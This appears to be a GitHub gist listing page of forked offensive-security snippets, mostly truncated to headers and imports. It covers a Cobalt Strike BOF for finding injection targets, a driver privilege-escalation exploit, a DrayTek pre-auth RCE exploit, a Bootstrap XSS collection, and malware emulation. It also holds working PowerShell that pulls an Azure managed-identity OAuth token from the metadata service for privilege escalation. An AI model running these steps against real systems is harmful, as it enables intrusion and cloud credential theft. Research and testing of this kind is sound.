#Wireless Penetration Testing Cheat Sheet
##WIRELESS ANTENNA
- Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
gdraperi
gdraperi
/ EnumCLR.c
Created
January 4, 2021 12:30
— forked from G0ldenGunSec/EnumCLR.c
Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <string.h> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <psapi.h> | |
| #include "beacon.h" | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
| DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
gdraperi
/ Wireless Penetration Testing Cheat Sheet.md
Created
April 28, 2020 07:09
— forked from dogrocker/Wireless Penetration Testing Cheat Sheet.md
Wireless Penetration Testing Cheat Sheet
gdraperi
/ wke-amp-lpe.py
Created
April 1, 2020 06:32
— forked from alxbl/wke-amp-lpe.py
WKE - Local Privilege Escalation using System Mechanics's AMP.sys driver
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import random | |
| import binascii | |
| import struct | |
| import os | |
| from ctypes import * | |
| from ctypes.wintypes import * | |
| # Shorthands for some ctypes stuff. |
gdraperi
/ CVE-2020-8515.go
Created
March 30, 2020 14:10
— forked from 0xsha/CVE-2020-8515.go
CVE-2020-8515: DrayTek pre-auth remote root RCE
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| CVE-2020-8515: DrayTek pre-auth remote root RCE | |
| Mon Mar 30 2020 - 0xsha.io | |
| Affected: |
gdraperi
/ MI-Owner-Escalation.ps1
Created
February 21, 2020 14:34
— forked from kfosaaen/MI-Owner-Escalation.ps1
A simple PoC for using an Azure Managed Identity to add a user as a Subscription Owner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #---------Query MetaData for SubscriptionID---------# | |
| $response2 = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing | |
| $subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId | |
| #---------Get OAuth Token---------# | |
| $response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing | |
| $content = $response.Content | ConvertFrom-Json | |
| $ArmToken = $content.access_token |
gdraperi
/ netgear-private-key-disclosure.md
Created
January 20, 2020 15:42
— forked from nstarke/netgear-private-key-disclosure.md
Netgear TLS Private Key Disclosure through Device Firmware Images
There are at least two valid, signed TLS certificates that are bundled with publicly available Netgear device firmware.
These certificates are trusted by browsers on all platforms, but will surely be added to revocation lists shortly.
The firmware images that contained these certificates along with their private keys were publicly available for download through Netgear's support website, without authentication; thus anyone in the world could have retrieved these keys.
gdraperi
/ ec2_info_retriever.py
Created
January 17, 2020 14:25
— forked from dastergon/ec2_info_retriever.py
A basic boto3 based tool for retrieving information from running EC2 instances.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from collections import defaultdict | |
| import boto3 | |
| """ | |
| A tool for retrieving basic information from the running EC2 instances. | |
| """ | |
| # Connect to EC2 | |
| ec2 = boto3.resource('ec2') |
gdraperi
/ Bootstrap_XSS.md
Created
December 12, 2019 08:20
— forked from BlackFan/Bootstrap_XSS.md
Bootstrap XSS Collection
gdraperi
/ follow_fork_child.py
Created
December 11, 2019 12:13
— forked from tahaconfiant/follow_fork_child.py
follow_fork_child
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # by [email protected] | |
| # LLDB custom command follow-fork-child, equivalent to GDB "follow-fork-mode child" | |
| # tested on $lldb --version | |
| # lldb-1100.0.30.6 | |
| # Apple Swift version 5.1.2 (swiftlang-1100.0.278 clang-1100.0.33.9) | |
| # (lldb) script | |
| # Python Interactive Interpreter. To exit, type 'quit()', 'exit()' or Ctrl-D. | |
| # >>> import sys | |
| # >>> print(sys.version) |
gdraperi
/ bundlore_emulation.py
Created
December 11, 2019 12:13
— forked from tahaconfiant/bundlore_emulation.py
bundlore_emulation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from unicorn import * | |
| from unicorn.x86_const import * | |
| from abc import ABC, abstractmethod | |
| class bundlore_emulation(ABC): | |
| def __init__(self): | |
| self.mu = Uc(UC_ARCH_X86, UC_MODE_64) | |
| self.BASE = 0x100000000 | |
| self.HEAP_SIZE = 64*1024 | |
| self.STACK_SIZE= 32*1024 |
NewerOlder